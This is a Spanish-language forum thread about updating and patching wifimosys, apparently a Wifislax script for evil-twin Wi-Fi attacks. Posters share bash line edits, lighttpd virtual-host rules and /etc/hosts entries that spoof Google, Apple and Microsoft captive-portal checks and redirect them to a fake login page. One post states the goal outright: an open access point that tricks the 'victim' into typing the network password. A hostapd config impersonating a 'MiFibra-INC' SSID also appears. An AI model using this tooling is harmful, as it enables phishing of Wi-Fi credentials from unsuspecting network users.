Seguridad Wireless - Wifi
Suite Seguridad Wireless => Live wifislax => Mensaje iniciado por: FAV1980 en 13-12-2019, 10:16 (Viernes)
-
Hola,tengo la version 0.22 de wifimosys y creo que esta por ahi la 0.25 me gustaria saber como actualizar wifimosys a esa version pues no se como hacerlo.Gracias de antemano y espero puedan ayudarme
-
Pues sí, la versión 0.25 está por aquí: https://github.com/Vodker/wifimosys (https://github.com/Vodker/wifimosys)
La pones como módulo y yastá.
Saludos.
-
salu2
wifimosys no detecta interfaces sustutuir lineas para que detecte ifaces
182 readarray -t wirelessifaces < <(airmon-ng | awk '{print $2}'| grep -v "^[[:space:]]*$" | sed '1d')
183 INTERFACESNUMBER=`airmon-ng| awk '{print $5}'| grep -c "."| grep -v "^[[:space:]]*$"`
242 WIFIMONITOR=$(airmon-ng start $PREWIFI | awk -F] '{ print $3 }' | cut -d ")" -f 1| grep -v "^[[:space:]]*$")
probado a mi detecta bien con pequeño cambio los nuemros de delante es el numero de linea a cambiar
-----------
añadir posibilidad de comprobacion de conectividad viejo ya se sabe pero la gente normal no configura movil a fondo
cambiar ruta de localhost en lighttpd para que se escuchen primero los otros vhost ademas de ruta de index pricipal a $DUMP_PATH/data/localhost
server.document-root = \"$DUMP_PATH/data/localhost\
mas linea en lighttpd para que escuche php e index personalizados
index-file.names = ( \"/index.html\", \"/index.php\", \"/generate_204.php\", \"/hotspot-detect.html\")
\$HTTP[\"host\"] =~ \"(^|\.)clients3.google\.com$\" {
server.document-root = \"$DUMP_PATH/data/clients3.google.com\"
#server.errorlog = \"$DUMP_PATH/data/clients3.google.com/clients3.google.com-error.log\"
accesslog.filename = \"$DUMP_PATH/data/clients3.google.com/clients3.google.com-access.log\"
}
\$HTTP[\"host\"] =~ \"(^|\.)captive.apple\.com$\" {
server.document-root = \"$DUMP_PATH/data/captive.apple.com\"
#server.errorlog = \"$DUMP_PATH/data/captive.apple.com/captive.apple.com-error.log\"
accesslog.filename = \"$DUMP_PATH/data/captive.apple.com/captive.apple.com-access.log\"
}
\$HTTP[\"host\"] =~ \"(^|\.)msftconnecttest\.com$\" {
server.document-root = \"$DUMP_PATH/data/msftconnecttest.com\"
#server.errorlog = \"$DUMP_PATH/data/msftconnecttest.com/msftconnecttest.com-error.log\"
accesslog.filename = \"$DUMP_PATH/data/msftconnecttest.com/msftconnecttest.com-access.log\"
}
----
meter ip a hosts
echo "
127.0.0.1 msftconnecttest.com www.msftconnecttest.com
127.0.0.1 captive.apple.com www.captive.apple.com
127.0.0.1 clients3.google.com www.clients3.google.com ">>"/etc/hosts"
-----
creacion de carpetas con index de redireccionamiento
if [ ! -d $DUMP_PATH/data/msftconnecttest.com ]; then
mkdir $DUMP_PATH/data/msftconnecttest.com
fi
if [ ! -d $DUMP_PATH/data/msftconnecttest.com/connecttest.txt ]; then
mkdir $DUMP_PATH/data/msftconnecttest.com/connecttest.txt
fi
if [ ! -d $DUMP_PATH/data/msftconnecttest.com/ncsi.txt ]; then
mkdir $DUMP_PATH/data/msftconnecttest.com/ncsi.txt
fi
if [ ! -d $DUMP_PATH/data/captive.apple.com ]; then
mkdir $DUMP_PATH/data/captive.apple.com
fi
if [ ! -d $DUMP_PATH/data/clients3.google.com ]; then
mkdir $DUMP_PATH/data/clients3.google.com
fi
########### Creamos index
echo " <?php header(\"Location: http://localhost/index.html\"); exit; ?>" >"$DUMP_PATH/data/clients3.google.com/generate_204.php"
echo " <head><meta http-equiv=\"refresh\" content=\"0; URL=http://localhost/index.html/\" /></head>" >"$DUMP_PATH/data/captive.apple.com/hotspot-detect.html"
echo " <?php header(\"Location: http://localhost/index.html\"); exit; ?>" >"$DUMP_PATH/data/msftconnecttest.com/index.php"
sleep 0.5 ;
echo " <?php header(\"Location: http://localhost/index.html\"); exit; ?>" >"$DUMP_PATH/data/msftconnecttest.com/connecttest.txt/index.php"
echo " <?php header(\"Location: http://localhost/index.html\"); exit; ?>" >"$DUMP_PATH/data/msftconnecttest.com/ncsi.txt/index.php"
-
salu2
wifimosys no detecta interfaces sustutuir lineas para que detecte ifaces
182 readarray -t wirelessifaces < <(airmon-ng | awk '{print $2}'| grep -v "^[[:space:]]*$" | sed '1d')
183 INTERFACESNUMBER=`airmon-ng| awk '{print $5}'| grep -c "."| grep -v "^[[:space:]]*$"`
242 WIFIMONITOR=$(airmon-ng start $PREWIFI | awk -F] '{ print $3 }' | cut -d ")" -f 1| grep -v "^[[:space:]]*$")
probado a mi detecta bien con pequeño cambio los nuemros de delante es el numero de linea a cambiar
esto serviria , pero hay mas problemas , se usa pyrit para testear si el handshake es bueno ... pyrit quedo un poco obsoleto , cuando algunas partes de python que usaba se fueron actualizando , y piryt no , causando que algunas opciones no funcionen bien, como la de "analyze" , he estado trasteando un poco , pero claro, es que ahora aircrack , captura handshakes auqnue no esten los 4 way , y piryt nunca da el visto bueno a dicha captura ...
el desarrollador de pyrit a cambiado esto hace unas horas
Pyrit is old, is outdated and it's still Python2 I am currently attempting to rewrite it from scratch, so thanks for all the stars but remember to keep an eye for Python3 version.
Ya que en enero , python2 , dejara de tener soporte , y todos estan intentado migrar a python3 ...
Una pena , por que lo de detectar las interfaces lo tiene apañao con los cambios de dinyly , pero ... siempre hay otros factores , ...
-
salu2
la comprobacion de pass no necesarimente es pyrit
esta la comprobacion en vivo como ya hace el script cuando lanzas con airbase + wpa suplicant
----
dejaste airmon-ng-old si recuerdo bien ....cambiar al viejo el resultado seria el esperado
-
salu2
la comprobacion de pass no necesarimente es pyrit
esta la comprobacion en vivo como ya hace el script cuando lanzas con airbase + wpa suplicant
----
dejaste airmon-ng-old si recuerdo bien ....cambiar al viejo el resultado seria el esperado
tampoco se genera el fake-ap , ... ;D
-
salu2
unmh no se ;D a eso ...
----
tambien esta la desatenticacion de clientes ....la red 5g ...dejesmoslo asi
yo hago mis configuraciones personales usando apache como proxy server + nginx
pase de lighttpd hace tiempo
-
salu2
unmh no se ;D a eso ...
----
tambien esta la desatenticacion de clientes ....la red 5g ...dejesmoslo asi
yo hago mis configuraciones personales usando apache como proxy server + nginx
pase de lighttpd hace tiempo
entonces por mucha interface que detecte el script , no va a funcionar, ¿lo sabes no? ... el script va de conseguir un handshake bueno , para usarlo de test al capturar el password , que se captura, creando un ap sin clave ..pero pidiendola , para que la victima la escriba y contrastar con el handshake bueno y ver si es valida ...
en fin , pa que me molesto .. lo que no esta en la distro es por que necesita ajustes para funcionar...en el mejor de los casos ...
-
salu2
i sin querer ofender
interface=wlan0
driver=nl80211
ssid=MiFibra-INC
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
y cambiando a airmon-ng-old no necesita tanta mod
como todo hay que cambiar cosas es un script **** por lo que ya se sabe asi de sencillo ... dejemos a los clasicos descansar en paz ;D
-
salu2
i sin querer ofender
interface=wlan0
driver=nl80211
ssid=MiFibra-INC
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
y cambiando a airmon-ng-old no necesita tanta mod
como todo hay que cambiar cosas es un script **** por lo que ya se sabe asi de sencillo ... dejemos a los clasicos descansar en paz ;D
ofender el que ?
solo digo que el script necesita muchos cambios y aun asi , no se si terminaria de funcionar, ..lo del airmon-ng-old, esta muy guay del paraguay .... hasta que me canse de aplicarle a los kernels el parche que permite seguir usandolo ...y ya no estara tan guay del paraguay y todo tendra que colar si o si con airmon-ng.
-
hay lighttpd url.redirect para android
para que salga la interfaz automatica como windows